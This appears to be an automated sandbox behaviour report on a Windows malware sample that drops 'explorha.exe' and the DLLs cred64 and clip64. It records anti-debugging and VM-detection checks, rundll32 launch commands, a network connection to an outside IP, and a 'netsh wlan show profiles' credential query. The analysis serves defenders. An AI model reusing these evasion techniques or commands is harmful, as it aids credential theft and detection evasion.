                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E09FA second address: 55E0A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F449CEB0746h 0x00000013 sub ebx, ebx 0x00000015 pushad 0x00000016 mov bl, 43h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b jmp 00007F449CEB0742h 0x00000020 je 00007F450E7F607Eh 0x00000026 pushad 0x00000027 mov ax, E29Dh 0x0000002b popad 0x0000002c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000033 jmp 00007F449CEB073Fh 0x00000038 mov ecx, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F449CEB0745h 0x00000041 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0A81 second address: 55E0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F450E5A9683h 0x0000000f jmp 00007F449CC63D7Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0AB7 second address: 55E0ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0ABB second address: 55E0ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0ABF second address: 55E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0AC5 second address: 55E0AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Bh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0AD4 second address: 55E0B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F450E7F5FF9h 0x00000011 pushad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop eax 0x00000015 pop edx 0x00000016 call 00007F449CEB0744h 0x0000001b pop edx 0x0000001c popad 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 jmp 00007F449CEB073Ch 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F449CEB0740h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F449CEB073Eh 0x00000033 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0B45 second address: 55E0B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F449CC63D86h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx ecx, di 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0B72 second address: 55E0BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F449CEB073Fh 0x0000000c adc eax, 06C5295Eh 0x00000012 jmp 00007F449CEB0749h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F449CEB073Ch 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0BB8 second address: 55E0BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0BBE second address: 55E0C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F449CEB0742h 0x00000012 sbb si, AFB8h 0x00000017 jmp 00007F449CEB073Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F449CEB0748h 0x00000023 sub ecx, 1FFE6A18h 0x00000029 jmp 00007F449CEB073Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0CD0 second address: 55E0CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ch, B1h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023FF3 second address: 1023FF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0DFC second address: 55F0E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E00 second address: 55F0E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E0F second address: 55F0E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E15 second address: 55F0E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F449CEB073Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F449CEB0740h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E45 second address: 55F0E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E49 second address: 55F0E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0A6E second address: 55F0A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov cx, 6329h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 mov eax, 434D6F9Dh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0A8B second address: 55F0A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0A8F second address: 55F0AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0AA3 second address: 55F0AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 call 00007F449CEB073Ah 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 mov ecx, 1B610E2Bh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F449CEB073Eh 0x00000021 pop ebp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F449CEB073Ch 0x0000002b sbb ecx, 1D1DB4E8h 0x00000031 jmp 00007F449CEB073Bh 0x00000036 popfd 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 567069D second address: 56706A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56706A1 second address: 56706BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56706BE second address: 56706F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 44D2h 0x00000007 jmp 00007F449CC63D83h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F449CC63D85h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56706F4 second address: 56706FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56608AF second address: 56608CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56608CA second address: 5660992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F449CEB073Ah 0x00000012 or esi, 35FB9F58h 0x00000018 jmp 00007F449CEB073Bh 0x0000001d popfd 0x0000001e pop eax 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F449CEB0741h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d push esi 0x0000002e pushfd 0x0000002f jmp 00007F449CEB0743h 0x00000034 add si, 937Eh 0x00000039 jmp 00007F449CEB0749h 0x0000003e popfd 0x0000003f pop esi 0x00000040 pushfd 0x00000041 jmp 00007F449CEB0741h 0x00000046 sbb ecx, 54D7F5B6h 0x0000004c jmp 00007F449CEB0741h 0x00000051 popfd 0x00000052 popad 0x00000053 pop ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F449CEB073Dh 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660992 second address: 5660998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660998 second address: 566099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56000DB second address: 560015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F449CC63D82h 0x0000000a and si, 67F8h 0x0000000f jmp 00007F449CC63D7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F449CC63D86h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D7Bh 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov cx, 7721h 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d mov dx, A91Eh 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007F449CC63D85h 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F449CC63D7Dh 0x00000041 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C1F second address: 5660C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F449CEB0746h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C47 second address: 5660C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C4D second address: 5660C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C51 second address: 5660C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Special instruction interceptor: First address: E7EF39 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Special instruction interceptor: First address: 1017B72 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Special instruction interceptor: First address: 10A75A6 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 8CEF39 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: A67B72 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: AF75A6 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_05660C66 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1332
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1326
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1077
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1083
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3985
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5840
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_1-11022
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6968 Thread sleep time: -58029s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1072 Thread sleep count: 1332 > 30
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1072 Thread sleep time: -2665332s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4144 Thread sleep count: 1326 > 30
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4144 Thread sleep time: -2653326s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6972 Thread sleep count: 258 > 30
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6972 Thread sleep time: -7740000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 332 Thread sleep time: -360000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6980 Thread sleep count: 1077 > 30
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6980 Thread sleep time: -2155077s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4080 Thread sleep count: 1083 > 30
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4080 Thread sleep time: -2167083s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 2032 Thread sleep count: 158 > 30
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 2032 Thread sleep time: -158000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
                                Source: explorha.exe, explorha.exe, 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: rundll32.exe, 00000008.00000003.2435834677.00000256D12C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D12BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                                Source: rundll32.exe, 00000008.00000003.2435834677.00000256D12C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: netsh.exe, 00000009.00000003.2362319007.0000021FF4074000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe System information queried: ModuleInformation
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_049F043A Start: 049F048B End: 049F040A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: SIWVID
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_05660C66 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E47BBB mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E4B922 mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0089B922 mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00897BBB mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0089B922 mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00897BBB mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0089B922 mov eax, dword ptr fs:[00000030h]
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00897BBB mov eax, dword ptr fs:[00000030h]
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
